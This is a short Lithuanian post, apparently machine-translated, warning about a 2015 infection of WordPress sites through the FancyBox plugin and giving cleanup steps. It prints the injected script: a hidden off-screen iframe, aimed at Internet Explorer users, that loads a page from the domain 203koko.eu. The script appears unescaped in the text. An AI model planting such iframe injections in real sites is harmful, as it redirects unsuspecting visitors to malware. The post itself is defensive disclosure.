Anksčiau šią savaitę svetainių ir dienoraščių numeris WordPress, gavo įspėjimus iš kenkėjiškų programų infekcija per "Google" administratoriai.
Problema, kad "Google" administratoriai nurodyta yra buvimas kodas / scenarijus "Iframe" kenkėjiška programa šaltinis interneto puslapis.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Atrodo, kad jis yra pažeidžiamumas a prijungtiacquis FancyBox skirta WordPress kuri iki vakar (05.02.2015) nebuvo atnaujintas ilgą laiką.
Spręsti šią problemą ir dezinfekuokite pažeistoms svetainėms naudojant šią kenkėjišką programą yra gana paprasta.
1. Išjunkite „FancyBox“ papildinį.
2. Ištrinti visus FancyBox įskiepių failus iš serverio (per FTP)
3. Įdiekite naują papildinio versiją (Fancybox 3.0.4)
FancyBox skirta WordPress 3.0.4
– Pervardijo nustatymą, kurį paveikė 3.0.3 versijoje minima saugos problema. Tai turėtų sustabdyti kenkėjiško kodo pasirodymą svetainėse, kuriose yra papildinys updated nepašalinus kenksmingo kodo.
FancyBox skirta WordPress 3.0.3
- Ištaisyta saugumo problemą.
Kenkėjiška programinė įranga:
TIPAS: Iframe peradresavimas
TARGET: WordPress „Fancybox“
Kenkėjiškų domene: 203koko.eu
ŽENKLO URIS: http://203koko.eu/hjnfh/ipframe2.php
KENKĖJIMO PROGRAMOS RAW KODAI:
RAŠYTA RAŠTŲ: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Pašalinkite kenkėjiškas programas iš savo WordPress Interneto svetainė.
